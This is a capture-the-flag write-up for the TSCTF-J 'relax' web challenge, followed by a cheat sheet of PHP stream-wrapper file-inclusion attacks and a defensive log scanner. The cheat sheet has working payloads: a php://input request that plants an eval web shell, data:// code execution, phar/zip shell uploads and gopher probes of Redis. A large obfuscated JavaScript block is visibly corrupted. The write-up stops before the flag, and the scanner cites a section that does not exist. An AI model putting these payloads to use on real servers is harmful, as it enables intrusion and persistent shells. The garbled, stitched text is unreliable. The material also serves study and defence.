
[TSCTF-J] relax

Posted: 2020-05-10 19:25:08


1. Source code audit

Running a scanner against the site turns up robots.txt.

It lists three files:

flag.php heicore.php relax.php

Only relax.php can be opened.

It contains the strange-looking characters below. Pasting them into the browser console and running them reveals what they do (this is emoticon-obfuscated JavaScript in the aaencode style; in this copy many of the non-ASCII emoticon characters have been replaced by "?", so the block as printed will not run):

?ω??= /`m′)? ~┻━┻   //*′?`*/ [‘_‘]; o=(???)  =_=3; c=(?Θ?) =(???)-(???); (?Д?) =(?Θ?)= (o^_^o)/ (o^_^o);(?Д?)={?Θ?: ‘_‘ ,?ω?? : ((?ω??==3) +‘_‘) [?Θ?] ,???? :(?ω??+ ‘_‘)[o^_^o -(?Θ?)] ,?Д??:((???==3) +‘_‘)[???] }; (?Д?) [?Θ?] =((?ω??==3) +‘_‘) [c^_^o];(?Д?) [‘c‘] = ((?Д?)+‘_‘) [ (???)+(???)-(?Θ?) ];(?Д?) [‘o‘] = ((?Д?)+‘_‘) [?Θ?];(?o?)=(?Д?) [‘c‘]+(?Д?) [‘o‘]+(?ω?? +‘_‘)[?Θ?]+ ((?ω??==3) +‘_‘) [???] + ((?Д?) +‘_‘) [(???)+(???)]+ ((???==3) +‘_‘) [?Θ?]+((???==3) +‘_‘) [(???) - (?Θ?)]+(?Д?) [‘c‘]+((?Д?)+‘_‘) [(???)+(???)]+ (?Д?) [‘o‘]+((???==3) +‘_‘) [?Θ?];(?Д?) [‘_‘] =(o^_^o) [?o?] [?o?];(?ε?)=((???==3) +‘_‘) [?Θ?]+ (?Д?) .?Д??+((?Д?)+‘_‘) [(???) + (???)]+((???==3) +‘_‘) [o^_^o -?Θ?]+((???==3) +‘_‘) [?Θ?]+ (?ω?? +‘_‘) [?Θ?]; (???)+=(?Θ?); (?Д?)[?ε?]=‘\\‘; (?Д?).?Θ??=(?Д?+ ???)[o^_^o -(?Θ?)];(o???o)=(?ω?? +‘_‘)[c^_^o];(?Д?) [?o?]=‘\"‘;(?Д?) [‘_‘] ( (?Д?) [‘_‘] (?ε?+(?Д?)[?o?]+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (?Θ?)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (???)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (???)+ (?Д?)[?ε?]+((???) + (?Θ?))+ (c^_^o)+ (?Д?)[?ε?]+(???)+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+(???)+ (???)+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(???)+ (c^_^o)+ (?Д?)[?ε?]+((???) + (o^_^o))+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(???)+ (c^_^o)+ (?Д?)[?ε?]+(???)+ (???)+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (c^_^o)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (c^_^o)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) - (?Θ?))+ (???)+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ (o^_^o)+ (?Д?)[?ε?]+(???)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (c^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(???)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+((???) + (o^_^o))+ (o^_^o)+ (?Д?)[?ε?]+(???)+ (???)+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ ((???) 
+ (o^_^o))+ (?Д?)[?ε?]+(???)+ (c^_^o)+ (?Д?)[?ε?]+((???) + (o^_^o))+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(???)+ (c^_^o)+ (?Д?)[?ε?]+(???)+ (???)+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (c^_^o)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (c^_^o)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) - (?Θ?))+ (???)+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ (o^_^o)+ (?Д?)[?ε?]+(???)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((o^_^o) +(o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (?Θ?)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (???)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(???)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+((???) + (o^_^o))+ (o^_^o)+ (?Д?)[?ε?]+(???)+ (???)+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(???)+ (c^_^o)+ (?Д?)[?ε?]+((???) + (o^_^o))+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(???)+ (c^_^o)+ (?Д?)[?ε?]+(???)+ (???)+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (c^_^o)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (c^_^o)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) - (?Θ?))+ (???)+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ (o^_^o)+ (?Д?)[?ε?]+(???)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+((???) + (?Θ?))+ (c^_^o)+ (?Д?)[?ε?]+((???) + (o^_^o))+ ((o^_^o) +(o^_^o))+ (?Д?)[?ε?]+((???) + (o^_^o))+ (???)+ (?Д?)[?ε?]+((???) + (?Θ?))+ (?Θ?)+ (?Д?)[?ε?]+(???)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+((???) + (o^_^o))+ (o^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (?Θ?)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((o^_^o) +(o^_^o))+ (?Д?)[?ε?]+((???) + (?Θ?))+ (c^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (?Θ?)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (o^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (o^_^o)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (???)+ (?Д?)[?ε?]+((???) + (?Θ?))+ (c^_^o)+ (?Д?)[?ε?]+(???)+ (???)+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+((???) 
+ (?Θ?))+ (?Θ?)+ (?Д?)[?ε?]+(???)+ ((o^_^o) +(o^_^o))+ (?Д?)[?ε?]+(???)+ ((o^_^o) +(o^_^o))+ (?Д?)[?ε?]+((???) + (?Θ?))+ (c^_^o)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((o^_^o) +(o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (?Θ?)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (???)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (???)+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (o^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ ((o^_^o) +(o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (???)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ ((o^_^o) +(o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (???)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (o^_^o)+ (?Д?)[?ε?]+((???) + (?Θ?))+ (c^_^o)+ (?Д?)[?ε?]+(???)+ (???)+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+((???) + (?Θ?))+ (???)+ (?Д?)[?ε?]+(???)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+(???)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+((???) + (?Θ?))+ (?Θ?)+ (?Д?)[?ε?]+((???) + (o^_^o))+ ((???) + (?Θ?))+ (?Д?)[?ε?]+((???) + (o^_^o))+ ((???) + (?Θ?))+ (?Д?)[?ε?]+((???) + (o^_^o))+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ (???)+ (?Д?)[?ε?]+(???)+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) - (?Θ?))+ (???)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(???)+ (c^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (???)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (c^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (o^_^o)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (?Θ?)+ (?Д?)[?ε?]+(?Θ?)+ ((???) 
+ (?Θ?))+ ((o^_^o) +(o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (???)+ (?Д?)[?ε?]+(???)+ (c^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (???)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (c^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(???)+ (c^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (c^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ ((o^_^o) +(o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (???)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (???)+ (?Д?)[?ε?]+(???)+ (c^_^o)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (?Θ?)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ ((o^_^o) +(o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (???)+ (?Д?)[?ε?]+(???)+ (c^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (???)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (c^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (?Θ?)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (???)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (o^_^o))+ (?Θ?)+ (?Д?)[?ε?]+((???) + (?Θ?))+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (???)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (c^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ (???)+ (?Д?)[?ε?]+(???)+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+((???) + (?Θ?))+ (?Θ?)+ (?Д?)[?ε?]+((???) + (?Θ?))+ (?Θ?)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (o^_^o))+ (o^_^o)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (o^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (c^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(???)+ (c^_^o)+ (?Д?)[?ε?]+(???)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+((???) + (o^_^o))+ (???)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (?Θ?)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) 
+ (o^_^o))+ (?Д?)[?ε?]+(???)+ (c^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (o^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (o^_^o)+ (?Д?)[?ε?]+((???) + (o^_^o))+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ (???)+ (?Д?)[?ε?]+(???)+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+((???) + (?Θ?))+ ((o^_^o) +(o^_^o))+ (?Д?)[?ε?]+((???) + (?Θ?))+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (?Θ?)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (?Θ?)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (o^_^o)+ (?Д?)[?ε?]+((???) + (?Θ?))+ ((???) + (o^_^o))+ (?Д?)[?ε?]+((o^_^o) +(o^_^o))+ (?Θ?)+ (?Д?)[?ε?]+((o^_^o) +(o^_^o))+ (o^_^o)+ (?Д?)[?ε?]+((???) + (?Θ?))+ ((o^_^o) +(o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (c^_^o)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ (???)+ (?Д?)[?ε?]+(???)+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+(???)+ (c^_^o)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (?Θ?)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (???)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (???)+ (?Д?)[?ε?]+((???) + (o^_^o))+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ (???)+ (?Д?)[?ε?]+(???)+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ (???)+ (?Д?)[?ε?]+(???)+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+((???) + (o^_^o))+ ((o^_^o) +(o^_^o))+ (?Д?)[?ε?]+((???) + (o^_^o))+ (???)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+((???) + (o^_^o))+ ((o^_^o) +(o^_^o))+ (?Д?)[?ε?]+(???)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+((???) + (o^_^o))+ (o^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (?Θ?)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ ((o^_^o) +(o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (o^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (???)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (???)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) 
+ (?Θ?))+ (?Д?)[?ε?]+((???) + (?Θ?))+ (c^_^o)+ (?Д?)[?ε?]+(???)+ (???)+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+((???) + (?Θ?))+ (?Θ?)+ (?Д?)[?ε?]+((???) + (o^_^o))+ (o^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (o^_^o))+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (???)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (o^_^o)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (o^_^o))+ (o^_^o)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (o^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (c^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(???)+ (c^_^o)+ (?Д?)[?ε?]+(???)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+((???) + (o^_^o))+ (???)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (?Θ?)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(???)+ (c^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (o^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (o^_^o)+ (?Д?)[?ε?]+((???) + (o^_^o))+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ (???)+ (?Д?)[?ε?]+(???)+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+((???) + (?Θ?))+ ((o^_^o) +(o^_^o))+ (?Д?)[?ε?]+((???) + (?Θ?))+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (?Θ?)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (?Θ?)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (o^_^o)+ (?Д?)[?ε?]+((???) + (?Θ?))+ ((???) + (o^_^o))+ (?Д?)[?ε?]+((o^_^o) +(o^_^o))+ (?Θ?)+ (?Д?)[?ε?]+((???) + (?Θ?))+ ((o^_^o) +(o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (?Θ?)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((o^_^o) +(o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ (???)+ (?Д?)[?ε?]+(???)+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+(???)+ (c^_^o)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (?Θ?)+ (?Д?)[?ε?]+(?Θ?)+ ((???) 
+ (?Θ?))+ (???)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (???)+ (?Д?)[?ε?]+((???) + (o^_^o))+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ (???)+ (?Д?)[?ε?]+(???)+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ (???)+ (?Д?)[?ε?]+(???)+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+((???) + (o^_^o))+ ((o^_^o) +(o^_^o))+ (?Д?)[?ε?]+(???)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+((???) + (o^_^o))+ (o^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (o^_^o))+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(???)+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+((???) + (?Θ?))+ (?Θ?)+ (?Д?)[?ε?]+((???) + (o^_^o))+ (o^_^o)+ (?Д?)[?o?]) (?Θ?)) (‘_‘);

Decoded result:

```php
$_ = $_GET['pw'];
$__ = $_GET['file'];
$___ = $_GET['(><)'];
if (isset($_) && (file_get_contents($_, 'r') === "Two thousand three hundred and thirty-three")) {
    echo '<img src="./images/13.jpg" alt=""><br>';
    include($__);
} else {
    echo '<img src="./images/1.gif" alt="">';
}
```

The check `file_get_contents($_, 'r') === "Two thousand three hundred and thirty-three"` can be satisfied through the php://input wrapper: set `pw=php://input` and send the expected sentence as the raw POST body, so that file_get_contents returns exactly that string.

The next idea was to read flag.php through include(),

but nothing came back. Suspecting a filter, the stream wrappers were used to read other files first.

2. Stream wrapper usage

**Wrappers for reading files**

  • php://filter

Used to read source code (no configuration requirement):

?page=php://filter/read=convert.base64-encode/resource=../flag.php

  • file://

Accesses the local file system and is unaffected by allow_url_fopen and allow_url_include. The path must be absolute:

?path=file:///var/www/html/flag.txt

Wrappers that execute PHP

  • php://input receives the POST body

    Requirements: allow_url_fopen: off/on, allow_url_include: on

PHP only fills $_POST from the request body when the Content-Type is application/x-www-form-urlencoded or multipart/form-data.

Only when the Content-Type is multipart/form-data does PHP withhold the request body from php://input; in every other case the body is available there.

php://input is a read-only stream of the raw request data; when an include() target points at it, the POST body is executed as PHP code.

It can be used to write a one-line web shell:

?xxx=php://input
POST body:
<?PHP fputs(fopen('shell.php','w'),'<?php @eval($_POST[pass])?>');?>
# Tested successfully on PHP 5.2.17; other versions all produced errors, cause unknown.
  • data://

The data:// wrapper executes PHP code directly, for example calling phpinfo():

?page=data://text/plain,<?php phpinfo();?>

If special characters are filtered here, the code can be base64-encoded first:

?page=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=
  • zip://, bzip2://, zlib://

zip://, bzip2:// and zlib:// are compression streams: they can access a file inside an archive, and the archive needs no particular extension.

If the site lets us upload archives, a PHP file can be compressed, uploaded, and then executed through zip://.

Once the zip is uploaded, it can be referenced by absolute or relative path to execute the PHP inside it.

  • phar://

This wrapper is PHP's archive reader: whatever the extension, the target is treated as an archive and unpacked.

Usage: ?file=phar://archive/inner-file

phar://xxx.png/shell.php Note: on PHP >= 5.3.0 the archive must be zip-compressed; rar does not work. After compressing the payload file, renaming it to any other extension still works. Steps: write a one-line shell file shell.php, compress it into shell.zip, then change the extension to png or another format.

  • Others

page=dict://127.0.0.1:80 # probe whether a port is open

page=gopher://127.0.0.1:6379/payload # operations such as getting a shell on a Redis service
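From the defender's side, every wrapper listed above shows up as a recognisable prefix in a query parameter, which makes it cheap to hunt for in access logs. The Python scanner below is an added example (my code, not part of the original post or the challenge) that flags any parameter value starting with one of these schemes, recognises the php://filter source-read chain from sections 1 and 3, and decodes a base64 data:// body to check for a PHP open tag. The log lines in SAMPLE_LOG are constructed; their paths and parameter names only echo the ones used in this writeup.

```python
import base64
import binascii
import re
from urllib.parse import unquote_plus

# Stream wrappers covered in the section above; any of them in a user-controlled
# parameter that reaches include() or file_get_contents() deserves an alert.
WRAPPER_RE = re.compile(
    r"^(php|file|data|zip|bzip2|zlib|compress\.zlib|compress\.bzip2|phar|dict|gopher)://",
    re.I,
)
# php://filter chain used to pull source code out as base64
FILTER_READ_RE = re.compile(r"^php://filter/.*resource=", re.I)
# The request-line portion of a combined-format access log entry
REQ_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')

# Constructed sample log lines (not captured from any real host); the paths and
# parameter names mirror the ones used in this writeup.
SAMPLE_LOG = """\
10.0.0.5 - - [10/May/2020:19:25:08 +0800] "GET /relax.php?pw=php://input&file=heicore.php HTTP/1.1" 200 512
10.0.0.5 - - [10/May/2020:19:25:10 +0800] "GET /relax.php?file=php://filter/read=convert.base64-encode/resource=relax.php&pw=php://input HTTP/1.1" 200 2048
10.0.0.7 - - [10/May/2020:19:26:00 +0800] "GET /relax.php?file=about.php HTTP/1.1" 200 300
10.0.0.9 - - [10/May/2020:19:27:00 +0800] "GET /index.php?page=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4= HTTP/1.1" 200 900
"""


def parse_query(target: str) -> list:
    """Split the query string of a request target into decoded (name, value) pairs.

    Done by hand rather than with urllib.parse.parse_qsl so that the ';' inside a
    data:// URL is never treated as a pair separator.
    """
    _, _, query = target.partition("?")
    pairs = []
    for part in query.split("&"):
        if part:
            name, _, value = part.partition("=")
            pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def analyze_request(target: str) -> list:
    """Return human-readable findings for one request target (path plus query)."""
    findings = []
    for name, value in parse_query(target):
        m = WRAPPER_RE.match(value)
        if not m:
            continue
        scheme = m.group(1).lower()
        findings.append(f"{name}: {scheme}:// wrapper")
        if FILTER_READ_RE.match(value):
            findings.append(f"{name}: php://filter source-read chain")
        if scheme == "data" and ";base64," in value:
            # Decode the inline body so an encoded <?php ... ?> does not slip past
            # a plain string match on the raw parameter
            try:
                body = base64.b64decode(value.split(";base64,", 1)[1], validate=True)
            except (binascii.Error, ValueError):
                body = b""
            if b"<?" in body:
                findings.append(f"{name}: base64 data:// body contains a PHP open tag")
    return findings


def scan_log(text: str) -> list:
    """Return (client_ip, findings) for every log line carrying a suspicious request."""
    hits = []
    for line in text.splitlines():
        m = REQ_RE.search(line)
        if not m:
            continue
        findings = analyze_request(m.group(1))
        if findings:
            hits.append((line.split()[0], findings))
    return hits


if __name__ == "__main__":
    for ip, found in scan_log(SAMPLE_LOG):
        print(ip, "->", "; ".join(found))
```

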